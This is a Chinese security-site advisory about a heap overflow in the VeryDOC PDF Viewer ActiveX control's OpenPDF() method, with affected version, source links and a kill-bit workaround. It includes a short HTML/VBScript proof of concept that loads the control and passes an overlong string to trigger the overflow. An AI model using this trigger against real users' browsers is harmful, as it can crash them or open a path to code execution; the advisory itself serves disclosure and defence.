首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
漏洞公告 :: 最新漏洞公告

VeryDOC PDFView ActiveX组件堆溢出漏洞


http://www.gipsky.com/
VeryDOC PDFView ActiveX组件堆溢出漏洞

发布日期:2008-11-15

更新日期:2008-11-18



受影响系统:



VeryDOC PDF Viewer ActiveX 2.0.0.1



描述:BUGTRAQ ID: 32313



VeryDOC的PDF Viewer ActiveX是一个PDF文件查看器组件。







PDFVIEW.PdfviewCtrl.1 ActiveX控件(pdfview.ocx)的OpenPDF()方式没有正确地验证用户输入参数,如果用户受骗访问了恶意网页并向该方式传送了超长字符串参数的话,就可以触发堆溢出,导致执行任意指令。



<*来源:r0ut3r (writ3r@gmail.com



链接:http://secunia.com/advisories/32725/

*>



测试方法:<font color='#FF0000'><p align='center'>警 告



以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!</p></font><object classid=%26#39;clsid:433268D7-2CD4-43E6-AA24-2188672E7252%26#39; id=%26#39;target%26#39;></object>







<script language=%26#39;vbscript%26#39;>



Sub Boom



buff = String(1006, "A")



target.OpenPDF buff, 1, 1







End Sub



</script>



<input type=button onclick=Boom() value=%26#39;Boom?%26#39;>



建议:临时解决方法:



* 为CLSID 433268D7-2CD4-43E6-AA24-2188672E7252设置kill-bit。



厂商补丁:



VeryDOC

-------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:







http://www.verydoc.com/pdf-viewer-ocx.html
<< Opera Web浏览器file://处理器堆溢出漏洞 Microsoft活动目录LDAP服务器用户名枚举漏洞 >>
评分
10987654321
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号